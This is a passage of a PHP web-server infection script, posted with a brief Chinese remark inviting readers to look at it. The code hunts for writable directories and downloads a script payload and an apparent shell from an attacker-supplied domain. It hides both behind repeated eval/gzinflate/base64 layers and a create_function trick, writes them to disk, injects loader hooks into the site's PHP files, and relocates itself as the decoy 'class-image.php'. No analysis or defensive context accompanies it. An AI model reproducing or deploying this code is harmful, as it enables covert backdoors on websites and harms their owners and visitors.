}
}
}
if (!function_exists('leave_clear_php')) {
function leave_clear_php(&$txt)
{
$txt = substr($txt, strpos($txt, '<?'), strlen($txt));
$txt = substr($txt, 0, strrpos($txt, '?>') + 2);
}
}
if (!function_exists('check_engine_install')) {
function check_engine_install()
{
global $_POST;
if (!isset($_POST['dgrules']) || trim($_POST['dgrules']) == "") {
return;
}
$_POST['dgrules'] = trim(clear_get_post_vars($_POST['dgrules']));
$GLOBALS['dgrules'] = explode(";", $_POST['dgrules']);
$tmp = explode("/", $GLOBALS['dgcp']);
while (count($tmp) > 0) {
$path = implode("/", $tmp);
if (check_engine_rules($path)) {
break;
}
unset($tmp[count($tmp) - 1]);
}
}
}
if (!function_exists('check_engine_rules')) {
function check_engine_rules($path)
{
foreach ($GLOBALS['dgrules'] as $key => $val) {
$val = trim($val);
$search_path = explode("@#@", $val);
$all_found = 1;
foreach ($search_path as $key2 => $val2) {
$val2 = trim($val2);
if (in_array($path . $val2, $GLOBALS['dg_wpi'])) {
return 0;
}
if (!(file_exists($path . $val2))) {
$all_found = 0;
break;
}
}
if ($all_found) {
foreach ($search_path as $key2 => $val2) {
if (is_writable($path . $val2)) {
$GLOBALS['dg_wpi'][] = $path . $val2;
echo "<font color='blue'>engine path {$path}{$val2}</font><br />";
return 1;
}
}
return 0;
}
}
return 0;
}
}
if (!function_exists('dgdownload')) {
function dgdownload($url, $connect_timeout)
{
if (!$url) {
return '';
}
$ret = '';
$url_info = parse_url($url);
if (!isset($url_info['port']) || !$url_info['port']) {
$url_info['port'] = 80;
}
if (!isset($url_info['path']) || !$url_info['path']) {
$url_info['path'] = '/';
}
if (isset($url_info['query']) && $url_info['query']) {
$url_info['path'] = $url_info['path'] . "?" . $url_info['query'];
}
$query = "GET {$url_info['path']} HTTP/1.0\r\n";
$query .= "Host: {$url_info['host']}\r\n";
$query .= "Accept: */*\r\n";
$query .= "Connection: close\r\n";
$query .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12\r\n";
$query = $query . "\r\n";
$errno = 0;
$error = "";
$sock = fsockopen($url_info['host'], $url_info['port'], $errno, $error, $connect_timeout);
$h = array();
$resp = array();
if ($sock) {
stream_set_timeout($sock, $connect_timeout);
fwrite($sock, $query);
$hd = false;
while (!feof($sock)) {
$l = fgets($sock);
if (!$hd) {
if (trim($l) == '') {
$hd = true;
} else {
$h[] = $l;
}
} else {
$resp[] = $l;
}
}
fclose($sock);
}
$ret = implode("", $resp);
return $ret;
}
}
if (!function_exists('save_text_to_file')) {
function save_text_to_file($fn, $t, $r = 0)
{
if ($r) {
$f = fopen($fn, "w");
} else {
$f = fopen($fn, "a");
}
if ($f) {
fwrite($f, $t);
fflush($f);
fclose($f);
$fs = filesize($fn);
if (($t <> '' && $fs) || ($t == '' && !$fs)) {
return 1;
} else {
$fn = str_replace("/", "\\", $fn);
$fs = filesize($fn);
}
if (($t <> '' && $fs) || ($t == '' && !$fs)) {
return 1;
}
} else {
return 0;
}
}
}
if (!function_exists('replace_substring')) {
function replace_substring(&$text, $pret, $postt, $str)
{
$pos = strpos($text, $pret);
if (!$pos) {
return false;
}
$pre = substr($text, 0, $pos + strlen($pret));
$pos = strpos($text, $postt, $pos);
if (!$pos) {
return false;
}
$post = substr($text, $pos, strlen($text));
if (strlen($pre) && strlen($post)) {
$text = $pre . $str . $post;
return true;
}
return false;
}
}
if (!function_exists('gfe')) {
function gfe($fn)
{
$ret = pathinfo($fn);
if (isset($ret['extension'])) {
return $ret['extension'];
} else {
return "";
}
}
}
if (!function_exists('prepare_pack')) {
function prepare_pack($php, $cycles = 0, $split_by_functions = 0, $zip = 0)
{
$ret = preg_replace("/^[^\s]+[\s]/U", "", $php);
$ret = preg_replace("/[\s][^\s]+\Z/", "", $ret);
$ret = trim($ret);
if ($split_by_functions) {
$tmp = preg_split('/\}\s+function/', $ret);
} else {
$tmp[] = $ret;
}
$skip_first = false;
if (count($tmp)) {
if ($split_by_functions && strpos($tmp[0], 'function') === 0) {
$tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0]));
} else {
$skip_first = true;
}
$ret = '';
$count = 0;
$total = count($tmp);
foreach ($tmp as $key => $val) {
$val = preg_replace("/\s+/", " ", $val);
$count++;
$count == $total ? $add = '' : $add = '}';
if ($total > 1 && !($count == 1 && $skip_first)) {
$next_encoded = '/*' . generate_string(50) . '*/ ' . 'function ' . trim($val) . $add;
} else {
$next_encoded = trim($val) . $add;
}
if ($zip && function_exists('gzdeflate')) {
$next_encoded = gzdeflate($next_encoded, 9);
}
$next_encoded = base64_encode($next_encoded);
if ($zip && function_exists('gzdeflate')) {
$ret .= "eval(gzinflate(base64_decode('{$next_encoded}')));";
} else {
$ret .= "eval(base64_decode('{$next_encoded}'));";
}
}
for ($i = 0; $i < $cycles; $i++) {
if ($zip && function_exists('gzdeflate')) {
$ret = gzdeflate($ret, 9);
}
$ret = base64_encode($ret);
if ($zip && function_exists('gzdeflate')) {
$ret = "eval(gzinflate(base64_decode('{$ret}')));";
} else {
$ret = "eval(base64_decode('{$ret}'));";
}
}
}
return $ret;
}
}
if (!function_exists('hide_eval')) {
function hide_eval($encoded_gzipped_code, $add_php_sign = 0, $marker = "")
{
$ret = "";
$replacement = "eval(gzinflate(base64_decode('";
$pos = strpos($encoded_gzipped_code, $replacement);
if (!($pos === false)) {
$encoded_gzipped_code = substr($encoded_gzipped_code, $pos + strlen($replacement), strlen($encoded_gzipped_code));
}
$replacement = "')));";
$pos = strpos($encoded_gzipped_code, $replacement);
if (!($pos === false)) {
$encoded_gzipped_code = substr($encoded_gzipped_code, 0, $pos);
}
$l = array(
"e",
"v",
"a",
"l",
"g",
"z",
"i",
"n",
"f",
"t",
"b",
"s",
"6",
"4",
"_",
"d",
"c",
"r",
"o",
"(",
")",
";",
"$"
);
shuffle($l);
$l = array_flip($l);
$a = "(";
foreach ($l as $k => $val) {
rand(0, 100) < 50 ? $sep = "'" : $sep = '"';
$a .= "{$sep}{$k}{$sep},";
}
$a = substr($a, 0, strlen($a) - 1) . ");";
if ($marker) {
$ret .= "\$" . "md5 = \"{$marker}\";\n";
}
$ret .= "\${$GLOBALS['dgeha']} = array{$a}\n";
$ret .= "\${$GLOBALS['dgehf']} = create_function('\$'.'v',\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['v']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['l']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['g']}].\${$GLOBALS['dgeha']}[{$l['z']}].\${$GLOBALS['dgeha']}[{$l['i']}].\${$GLOBALS['dgeha']}[{$l['n']}].\${$GLOBALS['dgeha']}[{$l['f']}].\${$GLOBALS['dgeha']}[{$l['l']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['t']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['b']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['s']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['6']}].\${$GLOBALS['dgeha']}[{$l['4']}].\${$GLOBALS['dgeha']}[{$l['_']}].\${$GLOBALS['dgeha']}[{$l['d']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['c']}].\${$GLOBALS['dgeha']}[{$l['o']}].\${$GLOBALS['dgeha']}[{$l['d']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['$']}].\${$GLOBALS['dgeha']}[{$l['v']}].\${$GLOBALS['dgeha']}[{$l[')']}].\${$GLOBALS['dgeha']}[{$l[')']}].\${$GLOBALS['dgeha']}[{$l[')']}].\${$GLOBALS['dgeha']}[{$l[';']}]);\n";
$ret .= "\${$GLOBALS['dgehf']}('{$encoded_gzipped_code}');\n";
$ret = trim($ret);
if ($add_php_sign) {
$ret = "<" . "?php\n" . $ret . "\n?" . ">";
}
return $ret;
}
}
if (!function_exists('generate_string')) {
function generate_string($len = 4)
{
$ret = '';
$arr = array(
'q',
'w',
'e',
'r',
't',
'y',
'u',
'i',
'o',
'p',
'a',
's',
'd',
'f',
'g',
'h',
'j',
'k',
'l',
'z',
'x',
'c',
'v',
'b',
'n',
'm'
);
for ($i = 0; $i < $len; $i++) {
$ret .= $arr[rand(0, count($arr) - 1)];
}
return $ret;
}
}
if (!function_exists('search_writable_dirs')) {
function search_writable_dirs($folder, &$madrs, &$flag)
{
if ($flag) {
return;
}
$folder = str_replace('\\', '/', $folder);
if (count($madrs) > 300) {
return;
}
if (isset($GLOBALS['dgbc'][$folder . "\n"])) {
echo "<b>CHECKED</b> <font color='yellow'>{$folder}</font><br />";
return;
}
if (!file_exists($folder)) {
echo "<b>NOT EXISTS</b> <font color='red'>{$folder}</font><br />";
return;
}
if (strpos(strtolower($folder), 'cache') || strpos(strtolower($folder), 'snapshot')) {
echo "<b>CACHE</b> <font color='orange'>{$folder}</font><br />";
return;
}
$h = opendir($folder);
if (!$h) {
return;
}
if (is_writable($folder)) {
$fn = substr(md5($folder . '/'), 0, 3) . '.php';
if (file_exists($folder . '/' . $fn) || file_exists($folder . '/cnf')) {
echo "<b>OLD SCRIPT</b> <b color='red'>{$folder}/{$fn}</b><br />[m1]<br />";
$madrs = array();
$madrs[$folder] = count($madrs) + 1;
$flag = 1;
return;
}
$madrs[$folder] = count($madrs) + 1;
}
while (($f = readdir($h)) !== FALSE) {
if ($f == '.' || $f == '..' || $f == '/' || $f == '\\') {
continue;
}
if ($folder == '/') {
$folder = '';
}
if (is_dir($folder . '/' . $f)) {
if (is_link($folder . '/' . $f)) {
continue;
}
if (strpos($folder . '/' . $f . '/', $GLOBALS['dgsp']) === false) {
echo "<b color='red'>SKIP: {$folder}/{$f}</b><br />";
continue;
}
search_writable_dirs($folder . '/' . $f, $madrs, $flag);
}
}
closedir($h);
flush();
}
}
if (!function_exists('dg_main_exec')) {
function dg_main_exec()
{
global $_SERVER;
echo "<hr /><div align='left'><br clear='all'>";
flush();
$ddrs = array();
$a = false;
$GLOBALS['dgcp'] = '';
echo "<h3>LOOKING FOR THE LONGEST PATH AT {$GLOBALS['dgsp']}</h3><small>";
search_writable_dirs($GLOBALS['dgsp'], $ddrs, $a);
echo "</small>";
flush();
$max = 0;
foreach ($ddrs as $key => $val) {
$fldr = explode('/', $key);
$c = count($fldr);
if ($max < $c) {
$max = $c;
$GLOBALS['dgcp'] = implode('/', $fldr);
}
}
if (!$GLOBALS['dgcp']) {
echo "<b color='red'>nowhere to write anything</b><br />[e4]";
die;
}
if ($GLOBALS['dgsp'] == $GLOBALS['dgcp']) {
echo "<b color='red'>can't write to the document root</b><br />[e5]";
die;
}
$GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']);
$GLOBALS['dgcp'] .= '/';
$GLOBALS['dgsp'] .= '/';
echo "the longest available path: <b>{$GLOBALS['dgcp']}</b><br />";
$GLOBALS['dgin'] = substr(md5($GLOBALS['dgcp']), 0, 3) . '.php';
$GLOBALS['dgeha'] = "a" . substr(md5($GLOBALS['dgin']), 0, 1);
$GLOBALS['dgehf'] = "b" . substr(md5($GLOBALS['dgin']), 0, 2);
$GLOBALS['dgij'] = "if(function_exists('ob_start')&&!isset(\$GLOBALS['mfsn'])){\$GLOBALS['mfsn']='{$GLOBALS['dgcp']}{$GLOBALS['dgin']}';if(file_exists(\$GLOBALS['mfsn'])){include_once(\$GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}";
flush();
$pms = dgdownload($GLOBALS['dg_pu'], 60);
if ($pms) {
echo "<b color='green'>[size: " . strlen($pms) . "]</b><br />[s2]<br />";
leave_clear_php($pms);
} else {
die("<b color='red'>download failed</b><br />[e2]<br />");
}
if (!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])) {
die("<b color='red'>failed to set path</b><br />[e6]");
}
echo "<b color='green'>path [{$GLOBALS['dgcp']}]</b><br />";
if (!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])) {
die("<b color='red'>failed to set name</b><br />[e7]");
}
if (!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])) {
die("<b color='red'>failed to set relative root dir</b><br />[e8]");
}
echo "<b color='green'>relative root dir [{$GLOBALS['dgsp']}]</b><br />";
$packed_js = prepare_pack($pms, rand(5, 10), 1, 1);
$packed_js = hide_eval($packed_js, 1);
if (save_text_to_file($GLOBALS['dgcp'] . $GLOBALS['dgin'], $packed_js, 1)) {
echo "<b color='green'>[{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br />[s4]<br />";
} else {
echo "<b color='red'>[{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br />[e9]<br />";
die;
}
$GLOBALS['dgsf'] = substr(md5($GLOBALS['dgin']), 0, 4) . '.php';
flush();
$shl = dgdownload($GLOBALS['dg_eu'], 60);
if ($shl) {
echo "<b color='green'>ss [size: " . strlen($shl) . "]</b><br />[s3]<br />";
leave_clear_php($shl);
} else {
echo "<b color='red'>download failed</b><br />[e3]<br />";
}
$shl = preg_replace("/^[^\s]+[\s]/U", "", $shl);
$shl = preg_replace("/[\s][^\s]+\Z/", "", $shl);
$shl = '/*' . generate_string(200) . '*/ ' . $shl . ' /*' . generate_string(200) . '*/ ';
$packed_js = prepare_pack($shl, rand(50, 100), 0, 1);
$packed_js = hide_eval($packed_js, 1);
if (save_text_to_file($GLOBALS['dgcp'] . $GLOBALS['dgsf'], $packed_js, 1)) {
echo "<b style:='color:green'>[{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br />[s5]<br />";
} else {
echo "<b color='red'>[{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br />";
}
echo "<small>";
echo "<h3>INJECTING PHP FILES</h3>";
check_engine_install();
if (count($GLOBALS['dg_wpi']) > 0) {
process_file_inject($GLOBALS['dg_wpi'][0], 1, 0);
all_php_inject($GLOBALS['dgsp'], 0, 0);
} else {
all_php_inject($GLOBALS['dgsp'], 1, 0);
}
if ($_SERVER['SCRIPT_FILENAME'] <> $GLOBALS['dgcp'] . $GLOBALS['dgmn']) {
if (copy($_SERVER['SCRIPT_FILENAME'], $GLOBALS['dgcp'] . $GLOBALS['dgmn'])) {
echo "File {$_SERVER['SCRIPT_FILENAME']} copied";
} else {
echo "Failed to copy file {$_SERVER['SCRIPT_FILENAME']}";
}
unlink($_SERVER['SCRIPT_FILENAME']);
} else {
echo "No need to copy file {$_SERVER['SCRIPT_FILENAME']}";
}
echo "</small><hr /><b>dgok</b></div>";
}
}
if (!isset($GLOBALS['dgbaw'])) {
$GLOBALS['dgbaw'] = 1;
if (isset($_GET['dgphpinfo'])) {
phpinfo();
die;
}
set_time_limit(1800);
ignore_user_abort(true);
$GLOBALS['dg_wpi'] = array();
$GLOBALS['dgrules'] = array();
$GLOBALS['dg_iver'] = "4.0";
$GLOBALS['http'] = 'http:/' . '/';
$GLOBALS['dgmn'] = "class-image.php";
$GLOBALS['dgfn'] = "";
$GLOBALS['dg_id'] = "";
$GLOBALS['dgix'] = '\$' . 'md5\s\=\s\"\w{32}\"\;\s*\$[^\s]+\s\=\s[^\s]+\;\s*\$[^\s]+\s\=\screate\_function[^\s]+\;\s*\$[^\s]+\s*(\S)';
if (isset($_GET['dgd']) || isset($_POST['dgd'])) {
error_reporting(E_ALL);
} else {
error_reporting(0);
}
if ($GLOBALS['dgmn'] && (!strpos($_SERVER['SCRIPT_FILENAME'], $GLOBALS['dgmn'])) || !file_exists($_SERVER['SCRIPT_FILENAME'])) {
if (file_exists($_SERVER['PATH_TRANSLATED'])) {
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
} else {
echo "<b color='red'>can't detect full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br />[e1]";
die;
}
}
if (!$GLOBALS['dg_id'] && isset($_GET['dgdomain']) && $_GET['dgdomain']) {
$GLOBALS['dg_id'] = $_GET['dgdomain'];
}
if (!$GLOBALS['dg_id'] && isset($_POST['dgdomain']) && $_POST['dgdomain']) {
$GLOBALS['dg_id'] = $_POST['dgdomain'];
}
if ((isset($_GET['dginit']) || isset($_POST['dginit']))) {
if (!$GLOBALS['dg_id']) {
die("[e13]");
}
$GLOBALS['dg_pu'] = "{$GLOBALS['http']}{$GLOBALS['dg_id']}/?update=js&host={$_SERVER['HTTP_HOST']}";
$GLOBALS['dg_eu'] = "{$GLOBALS['http']}{$GLOBALS['dg_id']}/?update=shl&host={$_SERVER['HTTP_HOST']}";
$_SERVER['SCRIPT_FILENAME'] = str_replace('\\', '/', $_SERVER['SCRIPT_FILENAME']);
$_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']);
die(dg_main_init());
} else {
die("<!--mn " . $GLOBALS['dgmn'] . "-->");
}
}
?>
有兴趣的可以看看哦~~我就不看了,哈哈
